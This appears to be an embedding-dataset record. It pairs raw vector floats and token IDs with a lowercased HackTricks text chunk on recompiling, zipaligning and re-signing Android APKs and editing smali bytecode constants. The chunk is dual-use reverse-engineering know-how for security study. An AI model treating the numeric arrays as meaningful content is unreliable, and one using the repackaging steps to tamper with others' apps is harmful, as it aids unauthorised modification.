0.1921897679567337, -0.7442735433578491, -0.460966020822525, -0.8103922605514526, 0.6171272397041321, -0.17177563905715942, -0.6604706048965454, 0.3550735116004944, -0.34607768058776855, -0.5544605255126953, -0.23653559386730194, -0.035157836973667145, 0.4708304703235626, 0.9127432107925415, -0.10466504842042923, -0.9775927662849426, -0.01662062481045723, 0.12752540409564972, 0.9257610440254211, -0.22081612050533295, -0.02381136082112789, -0.24665310978889465, -0.2912205755710602, 0.055993013083934784, -0.2413463145494461, 0.7500960230827332, -0.28961554169654846, -0.2734208106994629, -0.21250376105308533, 0.05412958189845085, -0.9033929705619812, 0.29446232318878174, 0.16337698698043823, -0.1354207992553711, 0.5890576839447021, -0.3615569770336151, 0.13321524858474731, 1.221455454826355, 0.15732631087303162, -0.6430550217628479, 0.6074415445327759, 0.05528460070490837, 0.6532160639762878, -0.5507374405860901, 0.636018693447113, 0.48335060477256775, 0.14963719248771667, -0.2864869236946106, -0.722538948059082, -0.26069796085357666, 0.0060045733116567135, -0.5510985851287842, 0.6412867307662964, -0.050539780408144, 0.3794735074043274, 0.008636606857180595, -1.2156291007995605, 0.7685021162033081, -0.4257442355155945, 0.039887044578790665, -0.3633957803249359, 0.36524543166160583, 1.0257965326309204, 0.4411070942878723, 0.9687507748603821, 0.18210472166538239, 0.075162872672081, -0.5001840591430664, -0.20884251594543457, -0.1288832426071167, -0.05973826348781586, 0.8868202567100525, 0.028663361445069313, -0.28905314207077026, 0.8018959164619446, -0.10738520324230194, -0.087093785405159, -0.3544418513774872, -0.4562841057777405, -0.5518954396247864, -0.25556138157844543, 0.43320512771606445, 0.18818195164203644, 0.091395802795887, 0.861138105392456, -0.8331295251846313, -0.6056209802627563, 0.06764859706163406, 0.3894023597240448, -0.010462780483067036, 0.310248464345932, 0.13781455159187317, -0.05696476995944977, -0.8934528827667236, 0.19270609319210052, 0.19178716838359833, 0.6035613417625427, 0.6008434295654297, -0.36832112073898315, 0.47218433022499084, -0.15075178444385529, -0.7720120549201965, 0.6155116558074951, -0.2714005410671234, -0.6108042001724243, 0.9451838731765747, 0.13633371889591217, 0.7539724111557007, -0.26483356952667236, 0.44928792119026184, -0.42576897144317627, -0.4156095087528229, 0.7710714340209961, 0.7844832539558411, -0.13684502243995667, -0.21302899718284607, -0.22170794010162354, -0.05797118693590164, -0.2501712143421173, 0.3051562011241913, 0.1056908369064331, 0.4731934070587158, -0.41057872772216797, -0.5990889668464661, -1.518087387084961, 0.9157164692878723, 0.967085599899292, 1.0548748970031738, 0.1591469645500183, 0.18186888098716736, -0.08382182568311691, -0.1899329572916031, 0.5450154542922974, -0.4825802147388458, 0.7294979095458984, 0.30422329902648926, 0.5336289405822754, -0.4471814036369324, 0.2442329376935959, -0.12329111248254776, -0.471471905708313, -0.5754052996635437, -0.08769404888153076, -0.010065127164125443, -0.14926786720752716, -0.4915282130241394, -0.6966695189476013, -0.250260591506958, 0.7720263004302979, -0.9460225105285645, -1.2008212804794312, -0.2703791558742523, 0.3953590989112854, 0.4632916748523712, -1.0246187448501587, -0.2939331829547882, -0.18575234711170197, 0.9491670727729797, -0.007200947962701321, -0.3285222053527832, 0.11324095726013184, -0.6862842440605164, -0.8357594013214111, -0.7224193811416626, 0.36548495292663574, 0.37807685136795044, 0.21713991463184357, 0.4222351014614105, -1.1590310335159302, -0.2953798770904541, 0.3341653048992157, 0.37755370140075684, -0.34442636370658875, -0.29835766553878784, -0.1644459217786789, 0.1488608568906784, 0.42977088689804077, -0.36472514271736145, -0.32464030385017395, 0.2852509617805481, -0.8298290371894836, 0.35601285099983215, -1.1693884134292603, 0.5300589799880981, -0.4335862100124359, -0.4344508647918701, 0.1812027543783188, 0.680984616279602, -0.17874819040298462, 0.35335808992385864, -0.3571089506149292, 0.12665650248527527, -0.8139811754226685, -0.12319966405630112, 0.6964873671531677, -0.14071790874004364, -0.04594575986266136, 1.0988582372665405, 0.04335148632526398, -0.46368393301963806, 0.6678832769393921, -0.13971704244613647, -1.2807475328445435, 0.8212669491767883, -0.3378290832042694, 0.5914615988731384, -0.029122335836291313, 0.45171812176704407, -0.27386459708213806, -0.06601011753082275, 1.0887001752853394, -0.20494674146175385, -0.00034816120751202106, -0.5860963463783264, -0.5282458662986755, -0.10743394494056702, -0.06768495589494705, 0.4458024203777313, 0.8124251961708069, 0.07136456668376923, -0.6343255639076233, 0.5451807975769043, -0.040139466524124146, 0.025752779096364975, -0.7741690278053284, -0.43681660294532776, -0.40885260701179504, -0.05856041982769966, -0.25191593170166016, 0.2412796914577484, -0.14910580217838287, -0.2836870849132538, 0.10082974284887314, -0.6439029574394226, -0.17465315759181976, -0.419709712266922, 0.19488994777202606, -0.8016270995140076, -0.1248784214258194, -0.5137923359870911, 0.02247769944369793, -0.49148258566856384, -0.2968202531337738, -0.11634243279695511, 0.38731464743614197, 0.32790884375572205, -0.04031754657626152, -0.2703836262226105, 0.8033910989761353, 0.1302921175956726, -0.09270260483026505, 0.3201931416988373, 0.447383850812912, 0.4802883565425873, 0.22122325003147125, -0.6871422529220581, -0.4684123992919922, -0.32346442341804504, -1.212036371231079, 0.6820021867752075, -0.5274901986122131, -0.015973052009940147, -0.44726094603538513, -0.8575041890144348, -0.13235534727573395, 0.7662172317504883, -0.2825857698917389, -1.0074149370193481, 0.6717905402183533, -0.27699652314186096, 0.057592857629060745, -0.24182111024856567, -0.1682170331478119, -0.6022165417671204, -0.6479768753051758, -0.03589298576116562, 0.7077274322509766, -0.4264349341392517, 0.2981418967247009, 0.2773493528366089, 0.13691501319408417, 0.2848677337169647, -0.1267787367105484, -0.7700079083442688, -0.543299674987793, 0.16318021714687347, -0.0945512130856514, -0.5501265525817871, 1.1760451793670654, -0.19018208980560303, 0.56294184923172, 0.020621437579393387, 0.0990384891629219, 0.11714247614145279, -0.18255789577960968, -0.3439776599407196, 0.06556645780801773, 0.634459376335144, -0.3531980514526367, 0.2611694633960724, -0.5042762756347656, 0.7927975654602051, -0.02225164882838726, 0.4040207266807556, -0.03440728038549423, -0.10215240716934204, -0.9058220386505127, -1.2364308834075928, 0.8786591291427612, -0.20047849416732788, -0.1995338350534439, -0.19810393452644348, 0.23852473497390747, 0.2936069369316101, -0.2780410051345825, -0.23558592796325684, 1.0197433233261108, 0.020087694749236107, 0.5908887386322021, -1.149155616760254, 0.2356063276529312, 0.730658233165741, 0.034890033304691315, -0.18306469917297363, -0.1972082257270813, -0.1006765216588974, 0.01745591312646866, -0.39607954025268555, -0.8909800052642822, -0.7007405757904053, 0.5179170966148376, 0.832999587059021, -0.5273513793945312, 0.294295072555542, 0.6293310523033142, -1.1300203800201416, -0.26910024881362915, -0.08469879627227783, -0.21890239417552948, -0.32007575035095215, 0.5438754558563232, 1.114928126335144, 0.4022296369075775, -0.42188602685928345, 0.1781574785709381, 0.14061999320983887, 0.09428755939006805, 0.62675541639328, -0.1582372635602951, -0.47599366307258606, 1.1845011711120605, 0.6460443735122681, -1.2072551250457764, -0.010470709763467312, -0.4404210150241852, -0.0037628302816301584, 0.3354191482067108, -0.3874343931674957, -0.3325656056404114, -0.7346604466438293, -0.09333661198616028, 0.2110922485589981, 0.6497118473052979, 0.03715866804122925, 0.2590544819831848, -0.07609259337186813, 0.48865437507629395, 0.04252052679657936, -0.38604041934013367, 1.0429143905639648, -1.0601119995117188, -0.4418511688709259, -0.8967298269271851, -0.27358222007751465, -0.09927307069301605, 0.6532543301582336, 0.5859635472297668, -0.15235550701618195, 0.9796465635299683, 0.3567551374435425, -0.23754999041557312, 0.6153513789176941, -0.7514205574989319, 0.5107718706130981, 0.5076470375061035, -0.6104093194007874, -0.3674808144569397, -0.33430933952331543, 0.3313169479370117, 0.23947644233703613, 1.010390281677246, -0.1741708219051361, -0.39590200781822205, -0.06289664655923843, 0.3712696135044098, 0.15794196724891663, -0.1834890991449356, -0.3740476071834564, -0.752896249294281, -0.46645960211753845, -0.034824591130018234, -0.15393555164337158, -0.4381394684314728, -0.03870152682065964, 0.04420330747961998, -1.08368980884552, -0.3071768283843994, 0.22297395765781403, -0.17627716064453125, 0.22773468494415283, -0.9715909957885742, 0.1320222020149231, -1.0846832990646362, -0.9094992876052856, -0.13827525079250336, 0.0030164693016558886, -0.15368707478046417, 0.25476741790771484, -0.34181344509124756, 0.26401689648628235, -0.84771728515625, 0.008479602634906769, -0.7579385042190552, 0.1092258021235466, 0.11840728670358658, -0.6083177924156189, -0.007169879972934723, 0.6398747563362122, -0.18909870088100433, 0.5833864808082581, 0.29573768377304077, 0.6380764245986938, 0.3255839943885803, -0.6084641218185425, 0.2402486354112625, -0.26402032375335693, 0.043857261538505554, 0.043248072266578674, 0.4365450441837311, -0.33332163095474243, 0.1914396733045578, -0.07604506611824036, -0.4046667814254761, -0.114984430372715, -0.202535018324852, -0.3756627142429352, 0.264461487531662, 0.2090822160243988, 0.24042189121246338, 0.7876397967338562, -0.14141210913658142, 0.49155211448669434, 0.016602564603090286, 0.15347450971603394, 0.5057340264320374, 0.06136208772659302, 0.3033168613910675, 0.4569423794746399, -0.04475698620080948, -0.7013689875602722, 0.3347943127155304, 0.5241510272026062, -0.3757852613925934, 1.0787110328674316, -0.6897269487380981, -0.17965058982372284, -0.11206341534852982, -0.4160396158695221, 0.06905349344015121, 0.17601589858531952, 0.7374997138977051, -0.4365238845348358, 0.20144562423229218, -0.08907894790172577, -0.47803738713264465, 0.008433129638433456, -0.665924608707428, -0.5676611065864563, -0.021702218800783157, -0.8962812423706055, -0.240062415599823, 0.022528303787112236, 0.256462037563324, 0.1015113964676857, 0.0037874551489949226, -0.2128698229789734, 0.5091426968574524, -0.12143553048372269, 0.23069049417972565, 0.6110647916793823, -0.24701756238937378, -0.5392889976501465, -0.32635387778282166, 0.6074133515357971, -0.560912549495697, -0.9316608905792236, 0.6092355847358704, 1.1580907106399536, -0.04575894773006439, -0.06267966330051422, -0.20923206210136414, -0.24842406809329987, 0.06860796362161636, -0.1883949488401413, -0.4565427005290985, 0.7933963537216187, -0.859839141368866, 0.40543296933174133, -0.7738998532295227, 0.3501628339290619, -0.48851263523101807, -0.5626700520515442, 0.33104294538497925, 0.28790339827537537, -0.024749675765633583, 0.8300386071205139, -0.08084553480148315, -0.11423742771148682, 1.039271354675293, 0.16672122478485107, 0.43707069754600525, -0.2762245237827301, 0.10176514834165573, -0.01926618628203869, 0.37341538071632385, 0.24901971220970154, 0.7207331657409668, -0.47046560049057007, 0.5267002582550049, 0.06600095331668854, -0.7207608222961426, -0.034374967217445374, 0.7965015172958374, 0.5686896443367004, 0.20833198726177216, -1.0173345804214478, -0.3650186359882355, -0.3041868209838867, -0.3133298456668854, -0.3726748526096344, 0.3709774911403656, 0.207684725522995, -0.15509489178657532, 0.12478874623775482, -0.24804776906967163, 0.07525354623794556, -0.2563287317752838, 0.7019800543785095, 0.039414290338754654, 0.13804472982883453, -0.055166762322187424, 0.19252559542655945, -0.4154975414276123, -0.05588816478848457, 0.5680425763130188, 0.3938100337982178, 0.04241226240992546, 0.3940759599208832, -0.4486507773399353, 0.6273185610771179, 1.0171151161193848, 0.23739102482795715, -0.590052604675293, -0.24740387499332428, 0.2767874300479889, 0.03483947739005089, -0.3574097454547882, 0.6845294237136841, 0.13548551499843597, -0.971544086933136, 0.2681831121444702, -0.027824310585856438, -0.3188660144805908, -0.3081682622432709, 0.5102108716964722, 0.5649874806404114, 0.22489753365516663, 0.326378732919693, -0.48327645659446716, -0.7472805380821228, 1.1704494953155518, 0.6058186888694763, 0.4432036578655243, -0.07177732139825821, 0.8643162250518799, -0.19292567670345306, 0.8645328283309937, -0.01958012953400612, -0.36273980140686035, -0.2888222634792328, -0.8327029347419739, -0.13552841544151306, -0.589768648147583, -0.3848193287849426, -0.2864818274974823, 0.9693711400032043, -0.7857577800750732, -0.5926170349121094, 0.15025146305561066, 0.4348391890525818, -0.5448358058929443, -0.9379255771636963, 0.5352712869644165, -0.12308036535978317, -0.9164276123046875, -0.07257112860679626, -0.15005654096603394, -0.1777627021074295, 0.4717767536640167, 0.327228307723999, -0.6660712361335754, -0.27734825015068054, -0.14350271224975586, -0.5766717791557312, 0.25508248805999756, -0.004340274725109339, -0.8182500004768372, 0.4154495894908905, -0.6927404403686523, -0.7109582424163818, 0.0033455851953476667, 0.0899781659245491, -0.5927832722663879, 0.43132713437080383, 0.6892112493515015, 0.5433635115623474, 0.3030931353569031, -0.41450023651123047, -0.34635522961616516, 0.62387615442276, 1.254342794418335, -0.09344416856765747, 0.7556808590888977, 0.4576651453971863, -0.707506537437439, 0.07030387222766876, 0.11902196705341339, 0.6038343906402588, -0.5479717254638672, -0.48086559772491455, -0.1798870712518692, 0.6722301244735718, -1.127823829650879, -0.6928222179412842, 0.5770783424377441, -0.386614054441452, 0.0055485195480287075, 0.5407875180244446, -1.2232921123504639, -0.03152935206890106, -1.048465371131897, -0.007300020195543766, -0.05601038411259651, 0.007724886294454336, -0.1524980664253235, -0.7301511168479919, 0.448956161737442, -0.8401733636856079, 4.186615467071533, 0.21381306648254395, 0.19096356630325317, 0.37218108773231506, 0.5383793711662292, 0.5084154009819031, 0.42693451046943665, -0.3791772127151489, 0.8061385750770569, -0.4710242450237274, 0.595737099647522, -0.435414582490921, 0.6459287405014038, 0.6574262976646423, 0.0014220221200957894, 0.7408981323242188, -0.8439875841140747, 0.27599087357521057, 0.3327108323574066, -0.7000870704650879, -1.1930134296417236, 0.7130842804908752, -0.39675045013427734, 0.48706740140914917, 0.15544098615646362, 0.6038079857826233, -0.11713559180498123, -0.732562780380249, -0.1379900723695755, -0.3510298728942871, -0.14244431257247925, -0.5997615456581116, 0.3706352710723877, -0.4017094075679779, -0.26762619614601135, 0.36723610758781433, -0.5980005860328674, -0.4644099473953247, 0.2606250047683716, 0.16838957369327545, -0.24828608334064484, -0.36771103739738464, 0.1689589023590088, 0.026102641597390175, 0.23475773632526398, 0.47319725155830383, -0.7453963160514832, 0.14772622287273407, 0.446432888507843, -0.7450074553489685, 0.7468520402908325, -0.6213905215263367, 0.9648386836051941, -0.05925095081329346, -0.8427183628082275, -0.05993277579545975, -0.11144829541444778, -0.35683169960975647, 0.4374012351036072, -0.08693444728851318, 0.5503172874450684, -0.752732515335083, -0.17696857452392578, 0.0025352092925459146, -0.7552251219749451, -0.12271110713481903, -0.38728198409080505, 0.17618054151535034, -0.5449071526527405, -0.27199622988700867, -0.17776891589164734, -0.31328901648521423, 0.4951210021972656, 0.13722269237041473, 0.4712076783180237, -0.054150618612766266, -0.19730663299560547, 0.5652579069137573, 0.37777194380760193, -0.5103927850723267, 0.10772185772657394, -0.20044638216495514, -0.812065601348877, -0.13194920122623444, 0.5525151491165161, 0.5523465871810913, -0.5558441877365112, -0.025957435369491577, 0.10089445859193802, 0.04602791741490364, 0.5247381925582886, 0.2216557264328003, -0.6134809851646423, 0.3193419873714447, -0.4834837317466736 ]
[ 101, 15488, 11475, 1011, 21933, 8737, 16281, 1013, 1031, 29226, 1033, 1013, 21953, 14045, 7292, 2015, 2009, 2003, 5875, 2000, 19933, 1996, 4646, 3642, 2000, 3229, 5023, 2592, 2005, 2017, 1006, 2672, 2092, 27885, 25608, 12921, 20786, 2015, 2030, 9245, 1007, 1012, 2059, 1010, 2009, 2071, 2022, 5875, 2000, 21933, 8737, 9463, 1996, 9706, 2243, 1010, 19933, 1996, 3642, 1998, 28667, 25377, 9463, 2009, 1012, 6728, 23237, 4431, 1024, 24471, 2140, 2126, 18161, 5107, 2996, 3642, 1998, 1996, 9706, 26086, 2497, 5331, 1010, 2017, 2064, 8073, 21933, 8737, 9463, 1010, 19933, 1010, 28667, 25377, 9463, 1010, 3696, 1004, 16500, 1996, 4646, 2302, 23448, 2151, 3094, 1012, 2178, 5896, 2008, 27777, 2023, 4708, 1037, 2843, 2003, 24471, 2140, 1996, 9706, 22332, 2075, 9706, 25509, 13669, 2017, 2064, 3229, 2000, 1996, 15488, 11475, 3642, 1998, 4219, 1024, 9706, 25509, 13669, 1040, 10439, 1012, 9706, 3211, 2546, 9706, 25509, 13669, 3957, 2017, 2151, 7561, 1010, 3046, 23658, 1996, 6745, 4617, 8462, 5875, 6764, 2017, 2323, 2298, 2024, 1024, 24501, 1013, 5300, 1013, 7817, 1012, 20950, 1006, 1998, 2035, 20950, 2015, 2503, 24501, 1013, 5300, 1013, 1008, 1007, 11924, 20799, 14081, 1012, 20950, 19092, 5371, 2007, 5331, 1012, 29296, 4221, 2030, 1012, 16962, 10128, 9706, 25509, 13669, 2038, 3471, 21933, 4667, 1996, 4646, 2202, 1037, 2298, 2000, 24471, 2140, 2030, 3046, 2478, 1996, 6685, 1011, 1054, 1006, 2079, 2025, 21933, 3207, 4219, 1007, 1012, 2059, 1010, 2065, 1996, 3291, 2001, 1999, 1037, 7692, 1998, 2025, 1999, 1996, 3120, 3642, 1010, 2017, 2180, 1005, 1056, 2031, 1996, 3291, 1006, 2017, 2180, 1005, 1056, 2036, 21933, 8737, 9463, 1996, 4219, 1007, 1012, 2689, 15488, 11475, 3642, 29337, 2064, 2689, 8128, 1010, 2689, 1996, 3643, 1997, 2070, 10857, 2030, 5587, 2047, 8128, 1012, 1045, 2689, 1996, 15488, 11475, 3642, 2478, 5443, 3642, 1010, 2017, 2059, 16500, 1996, 15488, 13911, 2063, 5331, 1998, 1996, 3559, 2097, 2425, 2017, 2065, 2151, 7899, 2003, 16542, 1012, 2070, 4973, 2064, 2022, 2179, 2182, 1024, 15488, 11475, 3431, 4973, 3995, 8649, 2571, 14931, 2546, 2760, 1011, 4618, 2057, 2377, 1037, 2208, 1029, 2030, 2017, 2064, 4638, 2917, 2070, 15488, 11475, 3431, 4541, 1012, 28667, 25377, 9463, 1996, 9706, 2912, 6199, 2121, 29226, 1996, 3642, 2017, 2064, 28667, 25377, 9463, 1996, 3642, 2478, 1024, 9706, 25509, 13669, 1038, 1012, 1001, 1999, 1996, 19622, 7013, 2043, 2017, 21933, 8737, 18450, 1996, 4646, 4183, 2097, 4012, 22090, 1996, 2047, 9706, 2243, 2503, 1996, 4487, 3367, 19622, 1012, 2065, 9706, 25509, 13669, 11618, 2019, 7561, 1010, 3046, 23658, 1996, 6745, 4617, 23773, 1996, 2047, 9706, 25509, 10222, 1010, 2017, 2342, 2000, 9699, 1037, 3145, 1006, 2017, 2097, 2022, 2356, 2005, 1037, 20786, 1998, 2005, 2070, 2592, 2008, 2017, 2064, 6039, 18154, 1007, 1024, 3145, 3406, 4747, 1011, 8991, 14839, 1011, 1058, 1011, 6309, 19277, 3145, 1012, 1046, 5705, 1011, 3145, 2389, 2290, 12667, 2050, 1011, 6309, 4697, 19627, 2620, 1011, 16406, 6694, 2692, 1011, 14593, 1026, 2115, 1011, 14593, 1028, 2633, 1010, 3696, 1996, 2047, 9706, 2243, 1024, 25067, 23773, 2121, 1011, 6309, 19277, 3145, 1012, 1046, 5705, 4130, 1013, 2000, 1013, 4487, 3367, 1013, 1008, 1026, 2115 ]
hack_tricks
424.txt
0
- alias > optimize new applicationzipalign is an archive alignment tool that provides important optimisation to android application ( apk ) files. more information here. zipalign [ - f ] [ - v ] < alignment > infile. apk outfile. apkzipalign - v 4 infile. apksign the new apk ( again? ) if you prefer to use [ apksigner ] ( https : / / developer. android. com / studio / command - line / apksigner ) * * instead of jarsigner, you should sing the apk after applying the optimization with zipaling * *. but notice that * * you only have to sign the applciation once * * with jarsigner ( before zipalign ) or with aspsigner ( after zipaling ). apksigner sign - - ks key. jks. / dist / mycompiled. apkmodifying smalifor the following hello world java code : public static void printhelloworld ( ) { system. out. println ( " hello world " ) } the smali code would be :. method public static printhelloworld ( ) v. registers 2 sget - object v0, ljava / lang / system ; - > out : ljava / io / printstream ; const - string v1, " hello world " invoke - virtual { v0, v1 }, ljava / io / printstream ; - > println ( ljava / lang / string ; ) v return - void. end methodthe smali instruction set is available here. light changesmodify initial values of a variable inside a functionsome variables are defined at the beginning of the function using the opcode const, you can modify its values, or you can define new ones : # numberconst v9, 0xf4240const / 4 v8, 0x1 # stringsconst - string v5, " wins " basic operations # mathadd - int / lit8 v0, v2, 0x1 # v2 + 0x1 and save it in v0mul - int v0, v2, 0x2 # v2 * 0x2 and save in v0 # move the value of one object into anothermove v1, v2 # condtionsif - ge # greater or equals
[ 0.11965588480234146, 0.2981923222541809, -0.27395814657211304, 0.8446865677833557, -0.05073048546910286, -0.16416683793067932, 0.07439912855625153, 0.29155898094177246, 0.62046879529953, 0.6509206295013428, 0.21903900802135468, -0.10206151008605957, 0.8191640377044678, -0.7095707654953003, -0.7366476058959961, -0.050851207226514816, -0.37157464027404785, -0.40290209650993347, -1.0042424201965332, 0.3554072082042694, -0.20051203668117523, -0.000022861011530039832, -1.229241132736206, -1.177412986755371, -0.13258711993694305, 0.9147342443466187, 0.21096289157867432, 0.08652805536985397, 0.6105438470840454, 0.675652027130127, -0.015324351377785206, -0.1518956571817398, -0.10140188038349152, -0.5794899463653564, -0.047036197036504745, -0.1556016206741333, 0.5428709983825684, 0.4690796732902527, 0.4149141013622284, -0.6442243456840515, 0.6047258377075195, -0.34208109974861145, 0.16150155663490295, -0.37691646814346313, -0.7210578918457031, -0.9305123090744019, 0.10677396506071091, -0.5542712211608887, 0.5270600318908691, 0.0412968173623085, -0.1101081371307373, 0.09545717388391495, 0.3197188973426819, 0.10060548782348633, -0.10050544142723083, 0.38956204056739807, 0.08485150337219238, 0.003683819668367505, -0.14383666217327118, 0.2706398367881775, -0.21971166133880615, 0.5874385833740234, 0.25148308277130127, -0.7190146446228027, -0.2595553994178772, 0.17883747816085815, 0.2050241231918335, -0.06798532605171204, 0.023076847195625305, -0.7218278050422668, -0.5974569916725159, 0.7706295251846313, -0.5121244788169861, -0.9726067185401917, -0.5047682523727417, -0.288017213344574, -0.27549755573272705, -0.18513920903205872, -0.15066683292388916, 0.9480462074279785, -0.03962736576795578, 0.7633910775184631, 0.39687955379486084, -0.0861000046133995, -0.4579010307788849, 0.002317116130143404, 0.41482672095298767, 0.6141869425773621, -0.249489888548851, 0.10343929380178452, 0.2318253070116043, 0.40497511625289917, -0.6455354690551758, -0.19554074108600616, 0.281601220369339, 1.0367100238800049, -0.8798280954360962, -0.047767672687768936, 0.3796493113040924, -0.1696813553571701, 0.627358615398407, 0.20474351942539215, 0.38908326625823975, 0.15349344909191132, -0.16810666024684906, 0.7489733695983887, 0.16959019005298615, -0.2379101812839508, 0.1873861402273178, -0.2827324867248535, 0.9471743702888489, -0.2094329446554184, 0.6221007108688354, -0.24398507177829742, -0.796809196472168, 0.8634669184684753, 0.5540024042129517, 0.5219048261642456, -0.5478077530860901, 0.47946152091026306, 0.46552351117134094, 0.2846667766571045, 0.0298501867800951, 0.49152398109436035, 0.15626831352710724, -0.17299699783325195, -0.03756650164723396, 0.7049336433410645, -0.40275147557258606, 0.1820596158504486, -0.5052258372306824, -0.25761693716049194, 0.030096402391791344, 0.7101197838783264, -0.34910038113594055, 0.7019733786582947, 0.3990294635295868, 0.17514926195144653, 0.5167475938796997, -0.5763212442398071, 0.07575362920761108, 0.47592711448669434, -0.23996607959270477, 1.8139899969100952, 0.11878737807273865, -0.16838963329792023, -0.5510716438293457, -0.10575635731220245, -0.1616310328245163, 0.12657193839550018, -0.1899869590997696, 0.18951506912708282, 0.6687827110290527, -0.33414003252983093, -0.5938094258308411, 0.21968936920166016, -0.5849958062171936, 0.11341211944818497, -0.04169966280460358, -0.1981760710477829, 0.010785692371428013, 0.4544498026371002, -0.3864477574825287, 0.49038830399513245, 0.2742144465446472, 0.46290796995162964, -1.0431548357009888, 0.04663205146789551, 0.08946806192398071, 0.3945358991622925, -0.012528449296951294, -0.06282014399766922, 0.0806373655796051, 0.33042100071907043, 0.5613686442375183, 1.0326842069625854, 0.30023548007011414, -0.3418320417404175, 0.2571740448474884, 0.04527386650443077, -0.5965324640274048, 0.054221294820308685, -0.17090143263339996, 0.7100779414176941, 0.17175205051898956, 0.518154501914978, -0.030237939208745956, -0.19974274933338165, -0.18241950869560242, -0.6935648322105408, -0.7185435891151428, 0.6022840738296509, -0.5712943077087402, 0.02888309210538864, -0.07427866756916046, -0.23504692316055298, -0.8890976309776306, -0.08893812447786331, -0.6054401993751526, -1.1364428997039795, -0.2937341332435608, 0.23466844856739044, -0.2625933289527893, 0.7880442142486572, -0.5131011009216309, -0.5436387062072754, 0.04403498023748398, 0.4210093915462494, -0.003647027537226677, 1.0011513233184814, 0.5997642278671265, 0.4142926037311554, -0.6954994201660156, -0.17547112703323364, 0.2090286761522293, -0.5128555297851562, -0.1432361751794815, 0.7112206816673279, 0.4815351665019989, 0.1857912540435791, 0.3927570879459381, 0.038913264870643616, 0.8554279208183289, 0.42771270871162415, -0.18848057091236115, 0.00107919133733958, -0.26398199796676636, 0.10455567389726639, -0.668249249458313, 0.19914153218269348, -0.06154584512114525, 0.46473005414009094, 0.808193027973175, 1.4487944841384888, 0.7232194542884827, 0.24459418654441833, -0.15985067188739777, 0.3794131875038147, -0.050678547471761703, -0.4163145124912262, 0.24802660942077637, 0.7117026448249817, 0.4561316967010498, 0.9060041308403015, -0.12200935930013657, -0.11115612089633942, -0.055546849966049194, 0.24508337676525116, 0.0015535749262198806, 0.04188436269760132, -0.035591010004282, 1.2919889688491821, 0.2537024915218353, -0.10245576500892639, -0.23893292248249054, 0.19836576282978058, 0.7109361886978149, 0.42069190740585327, -0.25524863600730896, -0.3707825839519501, 0.09926608949899673, 0.30446964502334595, -0.32876139879226685, -0.4065465033054352, -0.044736482203006744, 0.3104493021965027, -0.5128111839294434, 0.36424222588539124, -0.09233883023262024, -0.25648191571235657, -0.7431124448776245, -0.2744896411895752, -0.3415905237197876, -0.21889162063598633, -0.7927452921867371, 0.11821164935827255, 0.405441552400589, -0.5812859535217285, 0.38175100088119507, -0.029694147408008575, -0.6225631833076477, -0.5419443845748901, -0.08432751893997192, 0.7960233688354492, 0.33527565002441406, 0.261445552110672, -1.0001507997512817, -0.15078270435333252, -0.24882788956165314, 0.5215714573860168, -0.3218497037887573, 0.2531615197658539, 0.10128210484981537, -0.04480218142271042, 0.06316699832677841, 0.1894141286611557, 0.8220813870429993, 0.08479853719472885, -0.29789555072784424, 0.3752659261226654, 0.4448084831237793, 0.3524761497974396, -0.09443041682243347, -0.02537713386118412, 0.2705008387565613, 0.32386529445648193, -0.3194872736930847, -0.2852287292480469, 0.6227588653564453, 0.5807833671569824, -0.8615484833717346, 0.4610905051231384, -0.21305382251739502, -0.009708505123853683, -0.6107680201530457, -0.044576533138751984, 0.33185163140296936, 0.672735869884491, -0.5307573080062866, -0.6102697253227234, 0.2384374886751175, -0.1609279066324234, -0.23310579359531403, 0.36705684661865234, -0.06313648074865341, 0.4283951222896576, -0.010585060343146324, -1.0344449281692505, 0.4330844283103943, 0.2978532612323761, 0.2652132511138916, -0.5722757577896118, -0.23410432040691376, 1.0314280986785889, 0.2525138556957245, 0.2169092446565628, 0.05881109833717346, 0.05767058953642845, -0.14639289677143097, -0.06258245557546616, 0.4779604971408844, -0.21418799459934235, 0.9066742062568665, 0.18500962853431702, -0.17815488576889038, 0.6077376008033752, 0.2976458966732025, 0.242593914270401, -0.5899049043655396, 0.0348246730864048, -0.6973163485527039, -0.6427701711654663, 0.12441436201334, 0.4732849597930908, 0.16740906238555908, 0.51606684923172, -0.15365290641784668, -0.4196968972682953, 0.44214653968811035, 0.22144222259521484, 0.26781296730041504, 0.29551151394844055, 0.11684691160917282, 0.003545778337866068, -0.7264954447746277, -0.43766748905181885, 0.12819673120975494, 0.4296184182167053, 0.37995806336402893, -0.7523110508918762, 0.9242802858352661, -0.1410147249698639, -0.695020318031311, 0.6337701082229614, -0.2967092990875244, -0.8043316602706909, 1.0881351232528687, 0.06897856295108795, 0.25853976607322693, -0.36728203296661377, 0.28351500630378723, -0.43917447328567505, -0.04341542720794678, 0.7527625560760498, 0.7545596957206726, -0.12673154473304749, -0.3445912003517151, -0.2985202968120575, -0.1678464263677597, -0.5192342400550842, 0.02965446375310421, 0.1917296200990677, 0.218889057636261, -0.518557608127594, -0.2437516152858734, -0.6928602457046509, 0.5876568555831909, 0.4354146718978882, 0.6875458359718323, 0.28952163457870483, 0.5709867477416992, 0.2412259429693222, -0.6004140973091125, 0.3290654420852661, -0.390912801027298, 0.7236868739128113, -0.3635083734989166, 0.24469095468521118, -0.5265976786613464, -0.1552741378545761, -0.43999210000038147, -0.549909770488739, -0.79970383644104, -0.04044891521334648, -0.03271603211760521, -0.13756835460662842, -0.6197734475135803, -0.3993649482727051, -0.48152396082878113, 0.555941104888916, -0.6291570663452148, 0.13900615274906158, -0.2953423261642456, 0.1550416499376297, 0.31213757395744324, -0.9197275638580322, 0.09592609107494354, -1.0881465673446655, -0.0452791266143322, 0.11232546716928482, -0.016065126284956932, 0.021722843870520592, -0.067437082529068, -0.0973440483212471, -0.5123972296714783, 0.3825713098049164, 0.5443305373191833, -0.035988010466098785, 0.04356390982866287, -0.920824408531189, -0.11970708519220352, 0.9439150094985962, -0.3050229549407959, -0.4979913532733917, -0.5005940198898315, 0.1288880556821823, 0.4568851590156555, 0.593441367149353, -0.39998117089271545, -0.26936936378479004, 0.4742804765701294, -0.04233898967504501, 0.7425116896629333, -0.6123468279838562, 0.3980282247066498, -0.3368294835090637, -0.2610528767108917, 0.04371856525540352, 0.7388661503791809, -0.1816859096288681, 0.42843353748321533, -0.787093997001648, 0.05643622949719429, -0.6542194485664368, -0.7273326516151428, 0.3195638060569763, 0.3097350001335144, 0.35349684953689575, 0.6498234272003174, 0.1863633394241333, -0.7576870322227478, 0.15990765392780304, 0.5076900124549866, -0.5741319060325623, 0.5822312831878662, -0.14431774616241455, 0.5105229616165161, 0.5268834829330444, -0.021831614896655083, 0.017744872719049454, -0.7312585711479187, 0.5710515379905701, 0.06493429094552994, 